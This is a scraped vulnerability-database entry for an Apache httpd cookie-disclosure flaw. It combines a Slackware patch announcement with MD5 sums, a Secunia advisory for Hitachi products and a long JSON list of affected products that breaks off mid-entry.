Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 12.0 packages: 3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz 86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz
Slackware 12.1 packages: aab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz 1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz
Slackware 12.2 packages: f30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz 18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz
Slackware 13.0 packages: d3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz 0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: d15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz 1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz 49a5e4a73be2328d80cca186efe2f6f7 httpd-2.2.22-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: 4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz 1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz 783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz 8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz
Slackware -current packages: e709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz 97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz
Slackware x86_64 -current packages: 55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz 09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz
Then, restart the httpd daemon.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Hitachi Multiple Products Apache HTTP Server "httpOnly" Cookie Disclosure Vulnerability
SECUNIA ADVISORY ID: SA51626
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51626/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51626
RELEASE DATE: 2012-12-26
DISCUSS ADVISORY: http://secunia.com/advisories/51626/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51626/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51626
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Hitachi has acknowledged a vulnerability in multiple products, which can be exploited by malicious people to disclose potentially sensitive information.
For more information see vulnerability #1 in: SA47779
Please see the vendor's advisory for a list of affected products.
ORIGINAL ADVISORY: Hitachi (HS12-033): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-033/index.html
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0038", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "web server", "scope": "eq", "trust": 1.8, "vendor": "hitachi", "version": "02-03" }, { "model": "web server 02-04-/a", "scope": null, "trust": 1.5, "vendor": "hitachi", "version": null }, { "model": "web server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "02-01" }, { "model": "web server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "02-02" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "10" }, { "model": "enterprise linux eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.2" }, { "model": "http server", "scope": "gte", "trust": 1.0, "vendor": "apache", "version": "2.2.0" }, { "model": "storage", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "2.0" }, { "model": "http server", "scope": "lt", "trust": 1.0, "vendor": "apache", "version": "2.2.22" }, { "model": "http server", "scope": "gte", "trust": 1.0, "vendor": "apache", "version": "2.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "11.4" }, { "model": "jboss enterprise web server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "1.0.0" }, { "model": "http server", "scope": "lt", "trust": 1.0, "vendor": "apache", "version": "2.0.65" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "5.0" }, { "model": "web server 01-02-/b", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "web server 01-02-/a", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "web server 01-02-/c", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "http server", "scope": "eq", "trust": 0.8, "vendor": "apache", "version": "2.2.x to 2.2.21" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 to v10.7.4" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.6.8" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "v10.7 to v10.7.4" }, { "model": "sparc enterprise m3000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "sparc enterprise m4000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "sparc enterprise m5000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "sparc enterprise m8000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "sparc enterprise m9000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "1118" }, { "model": "hp system management homepage", "scope": "lt", "trust": 0.8, "vendor": "hewlett packard", "version": "v7.1.1 (linux" }, { "model": "hp system management homepage", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "windows and vmware esx)" }, { "model": "hp xp p9000", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "command view advanced edition suite" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "device manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "global link manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "provisioning manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "replication manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "tiered storage manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "tuning manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base(64)" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "interstage application framework suite", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage application server", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage apworks", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage business application server", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage job workload server", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage studio", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage web server", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "interstage web server express", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "systemwalker resource coordinator", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "web server linux", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "04-00" }, { "model": "web server linux", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "03-00" }, { "model": "web server 02-04-/b", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "web server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "02-04" }, { "model": "web server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "01-02" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "03-00" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.49" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "interstage studio enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.0.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.35" }, { "model": "p9000 replication manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1-00" }, { "model": "interstage apworks modelers-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "6.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.50" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.10" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "p9000 replication monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-00" }, { "model": "interstage studio standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.0" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.39" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "web server aix", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "10.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.3" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10-02" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "xp p9000 command view advanced edition", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1-00" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.43" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.55" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "interstage business application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.0.0" }, { "model": "web server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00-01" }, { "model": "web server security enhancement 02-04-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.17" }, { "model": "web server solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00-01" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.21" }, { "model": "interstage studio enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "10.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.20" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10-03" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "xp p9000 command view advanced edition", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1-00" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10-01(x64)" }, { "model": "interstage apworks modelers-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "7.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "jboss enterprise web server for rhel server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "51.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.45" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-10" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "web appliance", "scope": "ne", "trust": 0.3, "vendor": "sophos", "version": "3.7.9.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.28" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "web appliance", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "3.7.9" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.60" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.8" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "freeflow print server 73.c0.41", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.59" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "interstage studio standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.5" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00-05" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "12.2" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "junos space 13.1r1.6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.51" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.0.2" }, { "model": "p9000 tiered storage manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0.0-00" }, { "model": "web server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00-02" }, { "model": "web server )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "02-03" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nsm appliance generic offline for centos", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "51" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": 